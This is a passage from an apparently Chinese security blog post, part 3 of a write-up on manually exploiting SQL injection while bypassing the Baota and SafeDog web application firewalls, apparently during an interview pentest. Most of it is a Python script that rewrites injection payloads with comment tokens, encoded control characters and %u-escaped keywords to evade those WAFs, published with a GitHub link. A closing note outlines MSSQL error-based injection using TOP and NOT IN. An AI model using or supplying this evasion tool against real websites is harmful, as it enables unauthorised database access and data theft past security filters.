主页 > 网络知识 > 记一次面试bypass宝塔+安全狗的手注(3)

记一次面试bypass宝塔+安全狗的手注(3)

5.最后拓展下payload接收.最终代码如下

import random def bypass(payload):     chars1 = ['%01''%02''%03''%04''%05''%06''%07''%08''%09''%0A''%0B''%0C''%0D''%0E''%0F',               '%10''%11','%12''%13''%14''%15''%16''%17''%18''%19''%1A''%1B''%1C''%1D''%1E',               '%1F''%20']     chars2 = ["/**/""/*!*/""/*!safe6*/""+"]     v = random.choice(chars1)     payload = payload.replace(" ", random.choice(chars2))     payload = payload.replace("=", v + "=" + v)     payload = payload.replace("AND", v + "AND" + v)     payload = payload.replace("and", v + "AND" + v)     payload = payload.replace("WHERE", v + "WHERE" + v)     payload = payload.replace("where", v + "where" + v)     payload = payload.replace("UNION""u%u006eion")     payload = payload.replace("union""u%u006eion")     payload = payload.replace("CHAR""%u0063har")     payload = payload.replace("char""%u0063har")     payload = payload.replace("SELECT""se%u006cect")     payload = payload.replace("select""se%u006cect")     payload = payload.replace("FROM""%u0066rom")     payload = payload.replace("from""%u0066rom")     payload = payload.replace("(""+(")     payload = payload.replace("."".+")     payload = payload.replace("--""/*!*/--")     print(payload) if __name__ == '__main__':     while True:         payload = input("输入payload:")         if payload == 'q':             exit(0)         if payload:             bypass(payload)

已经打包上传github

地址:https://github.com/safe6Sec/bypassWAF

然后就可以愉快的手注了

mssql手注

从前期的来看,该注入点支持union注入和报错注入.我这边采用报错注入.

用union注入需要知道当前表有几列(和mysql一样用order by判断),还需要回显点

用报错注入主要是用top命令配合not in来进行注入

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!

您可能还会对这些文章感兴趣!